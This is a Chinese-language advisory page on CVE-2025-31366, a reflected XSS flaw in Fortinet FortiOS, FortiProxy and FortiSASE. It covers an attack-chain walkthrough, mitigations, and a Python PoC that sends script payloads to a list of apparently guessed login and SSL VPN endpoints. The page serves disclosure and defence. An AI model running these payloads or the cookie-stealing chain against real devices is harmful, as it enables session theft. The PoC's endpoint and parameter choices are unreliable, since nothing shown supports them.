CVE-2025-31366 Fortinet FortiOS/FortiProxy 反射型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-31366

漏洞类型

反射型跨站脚本攻击（Reflected XSS）

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Fortinet FortiOS、FortiProxy、FortiSASE

漏洞概述

CVE-2025-31366是Fortinet旗下多款网络安全产品中存在的一个反射型跨站脚本（Reflected XSS）漏洞，该漏洞源于Web页面生成过程中对用户输入的不当中和处理（CWE-79）。受影响的FortiOS版本范围极为广泛，从6.4系列一直到最新的7.6.3版本均受到影响，FortiProxy产品线同样存在类似问题，涵盖7.0至7.6.3的多个版本。此外，FortiSASE 25.2.a版本也受到波及。该漏洞由Fortinet产品安全事件响应团队（PSIRT）发现并报告，CVSS 3.1评分为4.7分，属于中危级别。攻击者无需任何认证即可利用此漏洞，但需要用户进行交互（如点击恶意链接）。该漏洞的危害在于攻击者可以通过精心构造的HTTP请求，将恶意JavaScript代码注入到受害者的浏览器上下文中执行。虽然漏洞本身不会直接导致系统被攻陷，但可被用于窃取用户会话凭证、进行钓鱼攻击、劫持用户浏览器会话或作为更大规模攻击链中的一个环节。由于Fortinet产品在全球企业网络中广泛部署，该漏洞的影响范围不容忽视。Fortinet官方已发布安全公告FG-IR-24-542，建议用户尽快升级到修复版本。

技术细节

该漏洞属于典型的反射型XSS漏洞，根因在于Fortinet系列产品在处理HTTP请求时，未对用户输入进行充分的过滤和转义处理。具体而言，当Web管理界面或SSL VPN门户等组件接收到包含恶意JavaScript代码的HTTP请求时，恶意负载会被直接反射回响应页面中，而浏览器会将其作为合法脚本执行。

从攻击原理来看，攻击者首先需要构造一个包含恶意脚本的URL或HTTP请求。由于漏洞为反射型，恶意代码不会持久化存储在服务器端，而是通过请求参数（如URL查询字符串、表单字段或HTTP头）传递，并在服务器响应中直接回显。攻击者通常会将恶意链接通过钓鱼邮件、即时通讯工具或社交工程手段发送给目标用户。当用户点击该链接并与目标Fortinet设备建立连接时，嵌入的恶意脚本将在用户的浏览器上下文中执行。

利用此漏洞，攻击者可以执行以下操作：1）窃取用户的会话Cookie，进而冒充合法用户访问管理界面；2）通过DOM操作修改页面内容进行钓鱼攻击；3）利用浏览器漏洞进行进一步渗透；4）记录用户键盘输入以获取敏感凭据。由于Fortinet设备通常位于企业网络边界，成功利用此漏洞可能为攻击者进一步攻击内部网络打开通道。

值得注意的是，该漏洞的攻击复杂度为高（AC:H），这意味着利用条件较为苛刻，需要特定的环境配置和用户交互。但对于广泛部署的Fortinet设备而言，仍构成实质性的安全威胁。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过Shodan、Censys等网络空间搜索引擎识别暴露在公网的Fortinet FortiOS、FortiProxy或FortiSASE设备，确定潜在攻击目标。

STEP 2

步骤2：构造恶意载荷

攻击者分析Fortinet设备的Web管理界面或SSL VPN门户，识别未经过滤的用户输入参数，并构造包含恶意JavaScript代码的HTTP请求URL。

STEP 3

步骤3：投递恶意链接

攻击者通过钓鱼邮件、社交工程或即时通讯工具将构造好的恶意URL发送给目标组织的网络管理员或VPN用户，利用社会工程学诱导用户点击。

STEP 4

步骤4：触发XSS执行

目标用户点击恶意链接后，浏览器向Fortinet设备发送HTTP请求，服务器将恶意脚本未经转义地反射回响应页面，浏览器执行嵌入的JavaScript代码。

STEP 5

步骤5：会话劫持与凭据窃取

恶意脚本在用户浏览器上下文中执行，窃取会话Cookie、管理员凭据或执行其他恶意操作，攻击者可利用窃取的会话信息冒充合法用户访问管理界面。

STEP 6

步骤6：横向渗透

获取管理权限后，攻击者可修改防火墙策略、VPN配置或利用设备作为跳板进一步渗透企业内网，扩大攻击影响范围。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-31366 - Fortinet FortiOS/FortiProxy Reflected XSS PoC
# Vulnerability: Improper Neutralization of Input During Web Page Generation (CWE-79)
# Affected: FortiOS 6.4-7.6.3, FortiProxy 7.0-7.6.3, FortiSASE 25.2.a

import requests
import urllib.parse

TARGET_URL = "https://target-fortinet-device"

# Reflected XSS payload - injected via URL parameter
XSS_PAYLOAD = "<script>alert(document.cookie)</script>"

# Common vulnerable endpoints in Fortinet devices
VULNERABLE_PATHS = [
    "/remote/login",
    "/remote/fgt_lang",
    "/sslvpn_logon.shtml",
    "/login",
    "/remote/logincheck"
]

def craft_xss_url(target, path, param_name, payload):
    """Craft a malicious URL with XSS payload in the parameter"""
    encoded_payload = urllib.parse.quote(payload)
    malicious_url = f"{target}{path}?{param_name}={encoded_payload}"
    return malicious_url

def exploit(target_url, path, param_name="redirect"):
    """Send crafted XSS request to the target"""
    url = craft_xss_url(target_url, path, param_name, XSS_PAYLOAD)
    print(f"[*] Malicious URL: {url}")

    try:
        # Send request - the payload will be reflected in the response
        response = requests.get(url, verify=False, timeout=10)
        print(f"[*] Status Code: {response.status_code}")

        # Check if payload is reflected in response
        if XSS_PAYLOAD in response.text or "<script>" in response.text:
            print("[+] XSS payload reflected in response - VULNERABLE!")
            return True
        else:
            print("[-] Payload not reflected - may be patched")
            return False
    except Exception as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == "__main__":
    requests.packages.urllib3.disable_warnings()

    for path in VULNERABLE_PATHS:
        print(f"\n[*] Testing endpoint: {path}")
        exploit(TARGET_URL, path)

# Example malicious URL that could be sent to a victim:
# https://victim-fortigate/remote/login?redirect=javascript:alert(document.cookie)
# https://victim-fortigate/sslvpn_logon.shtml?lang=en%22%3E%3Cscript%3Ealert(1)%3C/script%3E

影响范围

FortiOS 6.4 所有版本

FortiOS 7.0 所有版本

FortiOS 7.2 所有版本

FortiOS 7.4.0 - 7.4.8

FortiOS 7.6.0 - 7.6.3

FortiProxy 7.0 所有版本

FortiProxy 7.2 所有版本

FortiProxy 7.4 所有版本

FortiProxy 7.6.0 - 7.6.3

FortiSASE 25.2.a

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）限制Fortinet设备管理界面和SSL VPN门户的网络访问范围，仅允许可信IP地址通过防火墙规则访问；2）部署网络层Web应用防火墙（WAF）或入侵防御系统（IPS），对包含XSS特征的HTTP请求进行检测和阻断；3）在浏览器层面部署内容安全策略（CSP），限制脚本执行来源；4）对管理员和VPN用户进行安全培训，提高对钓鱼链接的识别能力；5）启用详细的访问日志记录，实时监控异常HTTP请求模式；6）考虑在管理界面访问前增加额外的认证层或VPN保护。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-31366
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-31366
3 Details https://www.cvedetails.com/cve/CVE-2025-31366/
4 VulDB https://vuldb.com/cve/CVE-2025-31366
5 Link https://fortiguard.fortinet.com/psirt/FG-IR-24-542